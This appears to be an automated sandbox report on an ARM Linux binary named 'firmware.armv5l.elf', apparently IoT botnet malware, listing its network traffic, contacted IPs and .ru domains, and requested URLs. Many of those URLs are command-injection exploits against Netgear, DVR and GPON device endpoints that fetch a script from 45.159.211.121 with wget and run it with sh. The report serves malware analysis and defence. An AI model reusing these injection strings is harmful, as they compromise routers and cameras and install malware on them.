Source: unknown Network traffic detected: HTTP traffic on port 33778 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33782 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 33784 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 50138 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59006 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59010 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59012 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59016 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59020 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59024 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59026 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 37186 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37196 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60274 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37216 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60286 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37228 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60300 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37244 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60314 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37260 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60328 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60336 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37278 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60350 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54470 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54484 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54500 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54510 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54526 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54542 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54552 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 36658 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36674 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36690 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36702 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36718 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36740 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36752 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50406 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50422 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50434 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50454 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50470 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50488 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50502 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 35424 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48414 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35444 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48434 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35460 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48450 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35474 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48464 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35492 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35510 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48500 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35524 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48516 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 36556 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36576 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36588 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36604 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36618 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36630 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36644 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 43676 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43684 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43704 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43724 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43740 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43754 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43768 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60054 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 60068 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 60084 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60102 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50104 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60118 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60134 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50134 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60146 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50148 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 50162 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 50526 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50538 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50550 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50560 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50582 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50600 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50612 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 54884 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54896 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54914 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54926 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54942 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54958 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54970 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 36112 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36134 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36156 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36172 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36186 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36204 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36218 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 33010 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33026 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33044 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33060 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33076 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33092 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33106 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 53106 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53122 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53138 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53156 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53174 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53192 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53208 -> 83
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/firmware.armv5l.elf (PID: 6267) Queries kernel information via 'uname': Jump to behavior
Source: firmware.armv5l.elf, 6267.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6271.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6273.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6296.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6281.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp Binary or memory string: Rx86_64/usr/bin/qemu-arm/tmp/firmware.armv5l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/firmware.armv5l.elf
Source: firmware.armv5l.elf, 6267.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6271.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6273.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6296.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6281.1.000055661cff5000.000055661d143000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: firmware.armv5l.elf, 6267.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6271.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6273.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6296.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6281.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: firmware.armv5l.elf, 6267.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6271.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6273.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6296.1.000055661cff5000.000055661d143000.rw-.sdmp, firmware.armv5l.elf, 6281.1.000055661cff5000.000055661d143000.rw-.sdmp Binary or memory string: fU!/etc/qemu-binfmt/arm
Source: firmware.armv5l.elf, 6271.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6273.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6296.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp, firmware.armv5l.elf, 6281.1.00007fffa9e8b000.00007fffa9eac000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.218.236.161
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ false
149.179.182.220
 unknown United Kingdom
87 INDIANA-ASUS false
48.42.214.126
 unknown United States
2686 ATGS-MMD-ASUS false
182.250.3.207
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
59.63.219.180
 unknown China
134238 CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN false
145.152.102.52
 unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
108.181.135.127
 unknown Canada
852 ASN852CA false
220.246.128.162
 unknown Hong Kong
4760 HKTIMS-APHKTLimitedHK false
64.242.160.135
 unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
74.1.232.61
 unknown United States
18566 MEGAPATH5-US false
86.155.78.56
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
133.18.152.129
 unknown Japan 24282 KIRKAGOYAJAPANIncJP false
164.223.194.88
 unknown United States
89 DNIC-AS-00089US false
187.173.190.40
 unknown Mexico
8151 UninetSAdeCVMX false
79.200.127.181
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
187.198.187.178
 unknown Mexico
8151 UninetSAdeCVMX false
68.242.191.250
 unknown United States
10507 SPCSUS false
196.87.46.194
 unknown Morocco
6713 IAM-ASMA false
82.78.55.228
 unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO false
109.178.116.120
 unknown Greece
29247 COSMOTE-GRCosmoteMobileTelecommunicationsSAGR false
129.150.204.101
 unknown United States
4192 STORTEK-INTUS false
211.96.74.118
 unknown China
17816 CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi false
39.222.19.254
 unknown Indonesia
23693 TELKOMSEL-ASN-IDPTTelekomunikasiSelularID false
60.133.225.142
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
48.238.80.224
 unknown United States
2686 ATGS-MMD-ASUS false
138.38.22.213
 unknown United Kingdom
786 JANETJiscServicesLimitedGB false
175.72.129.3
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
111.154.5.219
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
70.0.196.248
 unknown United States
10507 SPCSUS false
192.12.97.28
 unknown United States
383 AFCONC-BLOCK1-ASUS false
101.40.57.183
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
110.245.250.247
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
1.179.169.236
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH false
157.118.211.12
 unknown Japan 58785 TGU-NETTohokuGakuinUniversityJP false
91.225.100.217
 unknown Russian Federation
47342 TARIO-ASRU false
18.46.236.141
 unknown United States
3 MIT-GATEWAYSUS false
123.244.22.147
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
39.112.122.168
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
113.202.227.89
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
180.75.175.46
 unknown Malaysia
38322 WEBE-MY-AS-APWEBEDIGITALSDNBHDMY false
121.0.228.68
 unknown Korea Republic of
38661 HCLC-AS-KRpurplestonesKR false
78.162.35.205
 unknown Turkey
9121 TTNETTR false
137.251.132.126
 unknown Germany
5501 FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe false
89.148.156.133
 unknown Italy
59766 ASWICITYIT false
61.111.192.41
 unknown Korea Republic of
138195 MOACKCOLTD-AS-APMOACKCoLTDKR false
78.132.90.126
 unknown Austria
8412 TMARennweg97-99AT false
98.151.76.179
 unknown United States
20001 TWC-20001-PACWESTUS false
150.69.156.177
 unknown Japan 2907 SINET-ASResearchOrganizationofInformationandSystemsN false
179.115.189.172
 unknown Brazil
26599 TELEFONICABRASILSABR false
8.32.64.64
 unknown United States
3356 LEVEL3US false
72.221.63.92
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS false
148.184.19.120
 unknown United States
3423 ATTIS-ASN3423US false
172.132.168.234
 unknown United States
7018 ATT-INTERNET4US false
92.34.250.241
 unknown Sweden
2119 TELENOR-NEXTELTelenorNorgeASNO false
45.10.138.136
 unknown Poland
61154 INTEGRADESIGNPL false
40.152.60.248
 unknown United States
4249 LILLY-ASUS false
73.118.119.220
 unknown United States
7922 COMCAST-7922US false
125.211.28.87
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
137.253.183.153
 unknown United Kingdom
786 JANETJiscServicesLimitedGB false
86.113.244.254
 unknown United Kingdom
9142 CommercialISPGB false
180.99.217.9
 unknown China
137702 CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvince false
132.230.241.9
 unknown Germany
553 BELWUEBelWue-KoordinationEU false
106.180.169.98
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
157.118.135.104
 unknown Japan 58785 TGU-NETTohokuGakuinUniversityJP false
220.212.203.28
 unknown Japan 4725 ODNSoftBankMobileCorpJP false
73.32.129.208
 unknown United States
7922 COMCAST-7922US false
149.153.100.220
 unknown Ireland
1213 HEANETIE false
81.119.48.192
 unknown Italy
20959 TELECOM-ITALIA-DATA-COMIT false
99.25.45.180
 unknown United States
7018 ATT-INTERNET4US false
90.245.30.90
 unknown United Kingdom
5378 VodafoneGB false
83.56.195.67
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
138.230.175.70
 unknown United States
12980 EMEAHostingAutonomousSystemEU false
125.19.68.49
 unknown India
9498 BBIL-APBHARTIAirtelLtdIN false
172.56.48.0
 unknown United States
21928 T-MOBILE-AS21928US false
213.176.167.62
 unknown Spain
21193 XARXA-ASES false
223.8.251.208
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
169.112.99.128
 unknown United States
37611 AfrihostZA false
93.227.23.211
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
51.100.147.107
 unknown United States
2686 ATGS-MMD-ASUS false
114.15.177.122
 unknown Indonesia
56046 CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN false
202.183.244.229
 unknown Thailand
4750 CSLOXINFO-AS-APCSLOXINFOPUBLICCOMPANYLIMITEDTH false
65.170.138.96
 unknown United States
1239 SPRINTLINKUS false
41.152.76.215
 unknown Egypt
36992 ETISALAT-MISREG false
45.31.18.223
 unknown United States
7018 ATT-INTERNET4US false
138.224.52.237
 unknown Switzerland
12980 EMEAHostingAutonomousSystemEU false
148.94.37.88
 unknown United States
786 JANETJiscServicesLimitedGB false
201.60.60.131
 unknown Brazil
27699 TELEFONICABRASILSABR false
54.146.255.20
 unknown United States
14618 AMAZON-AESUS false
213.18.243.194
 unknown United Kingdom
5503 RMIFLGB false
200.161.72.79
 unknown Brazil
27699 TELEFONICABRASILSABR false
213.200.212.27
 unknown Switzerland
3303 SWISSCOMSwisscomSwitzerlandLtdCH false
189.149.73.45
 unknown Mexico
8151 UninetSAdeCVMX false
86.226.142.86
 unknown France
3215 FranceTelecom-OrangeFR false
49.214.94.45
 unknown Taiwan; Republic of China (ROC)
9924 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi false
106.117.33.86
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
63.145.54.182
 unknown United States
209 CENTURYLINK-US-LEGACY-QWESTUS false
205.134.172.65
 unknown United States
6405 AINUS false
189.241.240.26
 unknown Mexico
8151 UninetSAdeCVMX false
96.124.217.219
 unknown United States
7922 COMCAST-7922US false
209.75.2.247
 unknown United States
2914 NTT-COMMUNICATIONS-2914US false

Contacted Domains

Name IP Active
www.kdda.ru 159.69.115.63 true
afaa.ru 194.58.112.165 true
dfcl.ru 62.122.170.171 true
www.ckea.ru 194.120.116.196 true
leaa.ru 159.69.115.63 true
www.fbaa.ru 159.69.115.63 true
aefk.ru 89.253.219.24 true
www.aefk.ru 89.253.219.24 true
www.dalk.ru 178.159.33.243 true
lcbe.ru 31.31.205.163 true
www.dfcl.ru 62.122.170.171 true
dlab.ru 185.26.122.75 true
kdda.ru 159.69.115.63 true
www.call.ru 90.156.201.102 true
www.leaa.ru 159.69.115.63 true
www.abak.ru 78.138.138.136 true
faca.ru 185.12.92.157 true
eeae.ru 62.122.170.171 true
aabd.ru 188.114.97.3 true
www.akae.ru 62.122.170.171 true
alba.ru 185.135.83.132 true
www.clca.ru 172.67.167.8 true
akbf.ru 194.58.108.126 true
edee.ru 91.200.28.226 true
www.facd.ru 87.236.16.74 true
www.lllf.ru 37.230.114.67 true
eald.ru 194.58.112.165 true
www.dlab.ru 185.26.122.75 true
www.kddd.ru 31.177.76.145 true
www.adaa.ru 136.243.14.123 true
kkdb.ru 95.188.104.7 true
dalk.ru 178.159.33.243 true
adcd.ru 91.226.31.83 true
fcdk.ru 104.21.84.89 true
aekb.ru 62.122.170.171 true
ccel.ru 104.21.49.253 true
blfc.ru 31.31.205.163 true
www.cbbc.ru 194.58.112.174 true
www.eald.ru 194.58.112.165 true
ckea.ru 45.159.211.121 true
kddd.ru 31.177.76.145 true
www.aabb.ru 78.108.80.121 true
www.faca.ru 185.12.92.157 true
www.eeae.ru 62.122.170.171 true
lllf.ru 37.230.114.67 true
akae.ru 62.122.170.171 true
www.lcbe.ru 31.31.205.163 true
dkba.ru 195.208.1.100 true
www.ccel.ru 172.67.198.22 true
www.blfc.ru 31.31.205.163 true
www.calc.ru 188.114.96.3 true
dcae.ru 31.177.80.70 true
www.edee.ru 91.200.28.226 true
www.edac.ru 31.177.76.145 true
www.afab.ru 194.58.112.174 true
feba.ru 91.228.222.241 true
www.back.ru 62.122.170.171 true
ekac.ru 62.122.170.171 true
efla.ru 194.58.112.165 true
aabf.ru 45.130.41.118 true
www.kaac.ru 92.53.118.39 true
fcea.ru 62.122.170.171 true
www.aekb.ru 62.122.170.171 true
www.debf.ru 31.31.205.163 true
www.alba.ru 185.135.83.132 true
call.ru 90.156.201.102 true
cbbb.ru 188.114.97.3 true
kdca.ru 159.69.115.63 true
www.kdfc.ru 159.69.115.63 true
dala.ru 62.122.170.171 true
www.adcd.ru 91.226.31.83 true
www.clbc.ru 188.114.97.3 true
kdke.ru 31.31.205.163 true
bcda.ru 87.236.16.208 true
www.fabf.ru 62.122.170.171 true
lkfc.ru 159.69.115.63 true
www.bdaa.ru 159.69.115.63 true
www.aflb.ru 31.31.205.163 true
dake.ru 31.31.205.163 true
lakk.ru 62.122.170.171 true
bdaa.ru 159.69.115.63 true
dkel.ru 194.58.112.174 true
edla.ru 31.31.205.163 true
fabf.ru 62.122.170.171 true
www.fada.ru 157.230.19.197 true
www.lkad.ru 188.114.96.3 true
www.lakk.ru 62.122.170.171 true
abad.ru 62.122.170.171 true
www.dkel.ru 194.58.112.174 true
fada.ru 157.230.19.197 true
alke.ru 62.122.170.171 true
www.edla.ru 31.31.205.163 true
www.aafa.ru 194.58.112.165 true
www.eade.ru 159.69.115.63 true
fale.ru 91.226.31.83 true
clbc.ru 188.114.96.3 true
www.abad.ru 62.122.170.171 true
bakd.ru 194.58.112.174 true
www.delb.ru 62.122.170.171 true
www.lkfc.ru 159.69.115.63 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.168.0.8/language/Swedish false
  • Avira URL Cloud: safe
 unknown
http://192.168.0.75/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
    		unknown
    http://192.168.0.47/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
    • Avira URL Cloud: safe
    		 unknown
    http://192.168.0.44/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
      		unknown
      http://192.168.0.1/GponForm/diag_Form?images/ false
      • Avira URL Cloud: safe
      		 unknown
      http://192.168.0.83/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
        		unknown
        http://192.168.0.2/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
          		unknown
          http://188.114.97.3/ false
          • Avira URL Cloud: safe
          		 unknown
          http://192.168.0.47/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
          • Avira URL Cloud: safe
          		 unknown
          http://92.53.118.39/ false
          • Avira URL Cloud: safe
          		 unknown
          http://192.168.0.1/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
          • Avira URL Cloud: safe
          		 unknown
          http://192.168.0.13/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
            		unknown
            http://192.168.0.13/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
              		unknown
              http://192.168.0.13/language/Swedish false
              • Avira URL Cloud: safe
              		 unknown
              http://192.168.0.34/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                		unknown
                http://192.168.0.41/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                  		unknown
                  http://192.168.0.83/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.52/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.53/GponForm/diag_Form?images/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://136.243.14.123/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.52/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                    		unknown
                    http://192.168.0.47/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                      		unknown
                      http://192.168.0.52/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                        		unknown
                        http://192.168.0.91/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                          		unknown
                          http://192.168.0.34/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                            		unknown
                            http://185.135.83.132/ false
                            • Avira URL Cloud: safe
                            		 unknown
                            http://192.168.0.13/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                              		unknown
                              http://192.168.0.33/language/Swedish false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.6/language/Swedish false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.6/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                		unknown
                                http://192.168.0.34/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.47/GponForm/diag_Form?images/ false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.120/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.8/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                  		unknown
                                  http://62.122.170.171/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.5/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                    		unknown
                                    http://45.130.41.118/ false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://192.168.0.41/language/Swedish false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://95.188.104.7/ false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://192.168.0.191/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                      		unknown
                                      http://192.168.0.8/GponForm/diag_Form?images/ false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.41/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                        		unknown
                                        http://192.168.0.41/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                        • Avira URL Cloud: safe
                                        		 unknown
                                        http://192.168.0.1/language/Swedish false
                                        • Avira URL Cloud: safe
                                        		 unknown
                                        http://192.168.0.44/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                          		unknown
                                          http://185.26.122.75/ false
                                          • Avira URL Cloud: safe
                                          		 unknown
                                          http://159.69.115.63/ false
                                          • Avira URL Cloud: safe
                                          		 unknown
                                          http://192.168.0.8/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                            		unknown
